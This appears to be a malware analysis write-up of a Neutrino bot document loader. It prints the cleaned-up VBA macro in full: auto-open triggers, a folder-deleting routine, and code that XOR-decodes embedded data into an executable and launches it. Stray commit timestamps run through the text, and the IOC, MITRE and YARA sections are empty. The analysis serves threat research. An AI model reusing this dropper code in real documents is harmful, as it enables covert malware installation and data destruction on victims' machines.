2020-02-08 16:30:27 +00:00
# Neutrino physics 101
## Table of Contents
* [Malware analysis ](#Malware-analysis )
+ [The initial vector ](#Initial )
+ [Loader ](#loader )
* [Threat Intelligence ](#Intel )
+ [](#Sub_Intel)
* [Cyber kill chain ](#Cyber-kill-chain )
* [Indicators Of Compromise (IOC) ](#IOC )
* [Yara Rules ](#Yara )
* [References MITRE ATT&CK Matrix ](#Ref-MITRE-ATTACK )
* [Links ](#Links )
+ [Original Tweet ](#tweet )
+ [Link Anyrun ](#Links-Anyrun )
+ [Ressources ](#Ressources )
< h2 > Malware analysis < a name = "Malware-analysis" > < / a > < / h2 >
< h3 > The initial vector< a name = "Initial" > < / a > < / h3 >
2020-02-08 23:49:37 +00:00
< h6 > The initial vector is an malicious document using a macro. As the first look, we can note some constant variables can be replace and deletefor improvement the reading of the code.< / h6 >
``` VBA
Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHOneMask = 16515072
Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHTwoMask = 258048
Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHThreeMask = 4032
Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHFourMask = 63
Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHighMask = 16711680
Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHMidMask = 65280
Private Const HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHLowMask = 255
Private Const MNAJSAQQQQQQ18 = 262144
Private Const MNAJSAQQQQQQ12 = 4096
Private Const MNAJSAQQQQQQ6 = 64
Private Const MNAJSAQQQQQQ8 = 256
Private Const MNAJSAQQQQQQ16 = 65536
```
< h6 > We can see the both functions for auto-open the macro in the reading of the document for the Word and Excel document. This is for a common code for the both vectors or for reduce the rate of the detection, hard to say it.< / h6 >
``` VBA
Sub AutoOpen()
AddSpace
End Sub
Private Sub Workbook_Open()
AddSpace
End Sub
```
2020-02-09 15:02:50 +00:00
< h6 > This used an intermediate function for execute the main function.< / h6 >
``` VBA
Sub AddSpace()
RemoveParagraph
End Sub
```
< h6 > The first two functions used by the macro are for encoded and decode in base 64 in using multiples interations of the data.< / h6 >
``` VBA
Public Function Encode64(sString As String) As String
Dim bTrans(63) As Byte, OOOPOOOOPOOOO8(255) As Long, OOOPOOOOPOOOO16(255) As Long, bOut() As Byte, bIn() As Byte
Dim var_B As Long, lTrip As Long, iPad As Integer, lLen As Long, i As Long, var_A As Long, lOutSize As Long
For i = 0 To 63
Select Case i
Case 0 To 25
bTrans(i) = 65 + i
Case 26 To 51
bTrans(i) = 71 + i
Case 52 To 61
bTrans(i) = i - 4
Case 62
bTrans(i) = 43
Case 63
bTrans(i) = 47
End Select
Next i
For i = 0 To 255
OOOPOOOOPOOOO8(i) = i * 256
OOOPOOOOPOOOO16(i) = i * 65536
Next i
iPad = Len(sString) Mod 3
If iPad Then
iPad = 3 - iPad
sString = sString & String(iPad, Chr(0))
End If
bIn = StrConv(sString, vbFromUnicode)
lLen = ((UBound(bIn) + 1) \ 3) * 4
i = lLen \ 72
lOutSize = ((i * 2) + lLen) - 1
ReDim bOut(lOutSize)
lLen = 0
For var_B = LBound(bIn) To UBound(bIn) Step 3
lTrip = OOOPOOOOPOOOO16(bIn(var_B)) + OOOPOOOOPOOOO8(bIn(var_B + 1)) + bIn(var_B + 2)
i = lTrip And 16515072
bOut(var_A) = bTrans(i \ 262144)
i = lTrip And 258048
bOut(var_A + 1) = bTrans(i \ 4096)
i = lTrip And 4032
bOut(var_A + 2) = bTrans(i \ 64)
bOut(var_A + 3) = bTrans(lTrip And 63)
If lLen = 68 Then
bOut(var_A + 4) = 13
bOut(var_A + 5) = 10
lLen = 0
var_A = var_A + 6
Else
lLen = lLen + 4
var_A = var_A + 4
End If
Next var_B
If bOut(lOutSize) = 10 Then lOutSize = lOutSize - 2
If iPad = 1 Then
bOut(lOutSize) = 61
ElseIf iPad = 2 Then
bOut(lOutSize) = 61
bOut(lOutSize - 1) = 61
End If
Encode64 = StrConv(bOut, vbUnicode)
End Function
Public Function Decrypt(sString As String) As String
Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, OOOPOOOOPOOOO6(63) As Long, OOOPOOOOPOOOO12(63) As Long
Dim OOOPOOOOPOOOO18(63) As Long, lQuad As Long, iPad As Integer, var_B As Long, var_A As Long, sOut As String
Dim i As Long
sString = Replace(sString, vbCr, vbNullString)
sString = Replace(sString, vbLf, vbNullString)
i = Len(sString) Mod 4
If InStrRev(sString, "==") Then
iPad = 2
ElseIf InStrRev(sString, "=") Then
iPad = 1
End If
For i = 0 To 255
Select Case i
Case 65 To 90
bTrans(i) = i - 65
Case 97 To 122
bTrans(i) = i - 71
Case 48 To 57
bTrans(i) = i + 4
Case 43
bTrans(i) = 62
Case 47
bTrans(i) = 63
End Select
Next i
For i = 0 To 63
OOOPOOOOPOOOO6(i) = i * 64
OOOPOOOOPOOOO12(i) = i * 4096
OOOPOOOOPOOOO18(i) = i * 262144
Next i
bIn = StrConv(sString, vbFromUnicode)
ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)
For var_B = 0 To UBound(bIn) Step 4
lQuad = OOOPOOOOPOOOO18(bTrans(bIn(var_B))) + OOOPOOOOPOOOO12(bTrans(bIn(var_B + 1))) + OOOPOOOOPOOOO6(bTrans(bIn(var_B + 2))) + bTrans(bIn(var_B + 3))
i = lQuad And 16711680
bOut(var_A) = i \ 65536
i = lQuad And 65280
bOut(var_A + 1) = i \ 256
bOut(var_A + 2) = lQuad And 255
var_A = var_A + 3
Next var_B
sOut = StrConv(bOut, vbUnicode)
If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)
Decrypt = sOut
End Function
```
< h6 > The next function is for delete the existing content.< / h6 >
``` VBA
Public Sub Wipedir(path As String)
Dim ScriptingObj
Set ScriptingObj = CreateObject("Scripting.FileSystemObject")
If ScriptingObj.folderexists(path) Then
ScriptingObj.deletefolder path
Else
End
End If
End Sub
```
< h6 > The last functions are the main function and that allow to execute the macro. This xor the content of the data by 76 (0x4C), write in on the all users location and execute the loader.< / h6 >
``` VBA
Sub RemoveParagraph()
Dim j As Integer
Dim Name_Payload As String
Dim Path As String
Dim FreeFileSlot As Integer
Dim para As Paragraph
Dim i As Long
Dim data_para As String
Dim Byte_payload As Byte
Dim Unknown_Ref As String
Unknown_Ref = "Startincex"
Path = Environ("ALLUSERSPROFILE") + "\Memsys"
If Len(dir(Path, vbDirectory)) = 0 Then
MkDir (Decrypt(Encode64(Path)))
Else:
Wipedir (Path)
MkDir (Decrypt(Encode64(Path)))
End If
Name_Payload = "ms.exe"
ChDrive (Path)
ChDir (Decrypt(Encode64(Path)))
FreeFileSlot = FreeFile()
Open Name_Payload For Binary As FreeFileSlot
j = 0
For Each para In ActiveDocument.Paragraphs
DoEvents
data_para = para.Range.Text
i = 1
j = j + 1
If j >= 24 Then
While (i < Len ( data_para ) )
Byte_payload = "& H" & Mid(data_para, i, 2)
Byte_payload = Byte_payload Xor & H4C ' Xor 76
Put #FreeFileSlot , , Byte_payload
i = i + 2
Wend
End If
Next
Close #FreeFileSlot
Exec (Name_Payload)
End Sub
Sub Exec(Name_Payload0 As String)
Dim Path As String
Dim OBsGG
Path = Environ("ALLUSERSPROFILE") + "\Memsys"
ChDrive (Path)
ChDir (Decrypt(Encode64(Path)))
OBsGG = Shell((Path + "\ms.exe"), 1)
End Sub
```
< h2 > Threat Intelligence< / h2 > < a name = "Intel" > < / a > < / h2 >
2020-02-08 16:30:27 +00:00
< p align = "center" >
< img src = "" >
< / p >
< p align = "center" >
< h2 > Cyber kill chain < a name = "Cyber-kill-chain" > < / a > < / h2 >
< h6 > The process graph resume cyber kill chains used by the attacker :< / h6 >
< p align = "center" >
2020-02-08 16:34:03 +00:00
< img src = "https://raw.githubusercontent.com/StrangerealIntel/CyberThreatIntel/master/Additional%20Analysis/Neutrino/Pictures/cyberkill.PNG" >
2020-02-08 16:30:27 +00:00
< / p >
< h2 > Indicators Of Compromise (IOC) < a name = "IOC" > < / a > < / h2 >
< h6 > List of all the Indicators Of Compromise (IOC)< / h6 >
|Indicator|Description|
| ------------- |:-------------:|
< h6 > The IOC can be exported in < a href = "" > JSON< / a > < / h6 >
< h2 > References MITRE ATT& CK Matrix < a name = "Ref-MITRE-ATTACK" > < / a > < / h2 >
|Enterprise tactics|Technics used|Ref URL|
| :---------------: |:-------------| :------------- |
2020-02-08 16:34:03 +00:00
< h6 > This can be exported as JSON format < a href = "" > < / a > < / h6 >
2020-02-08 16:30:27 +00:00
< h2 > Yara Rules< a name = "Yara" > < / a > < / h2 >
< h6 > YARA Rules are available < a href = "" > here< / a > < / h6 >
< h2 > Links < a name = "Links" > < / a > < / h2 >
< h6 > Original tweet: < / h6 > < a name = "tweet" > < / a >
* [https://twitter.com/JAMESWT_MHT/status/1225796259845414912 ](https://twitter.com/JAMESWT_MHT/status/1225796259845414912 )
< h6 > Links Anyrun: < a name = "Links-Anyrun" > < / a > < / h6 >
* [impor.doc ](https://app.any.run/tasks/454fe6a2-e2d0-4fa3-ba1d-78e2c7372ddd )
< h6 > Resources : < / h6 > < a name = "Ressources" > < / a >
2020-02-08 23:50:11 +00:00
2020-02-08 23:49:37 +00:00
* [Encode64 / Decode64 in VB.NET ](https://stackoverflow.com/questions/12879661/encode64-decode64-in-vb-net )
* [New Neutrino Bot comes in a protective loader ](https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/ )
2020-02-08 16:30:27 +00:00
* [URLhaus Neutrino ](https://urlhaus.abuse.ch/browse/tag/Neutrino/ )
* [VB2019 paper: Rich Headers: leveraging this mysterious artifact of the PE format ](https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/ )
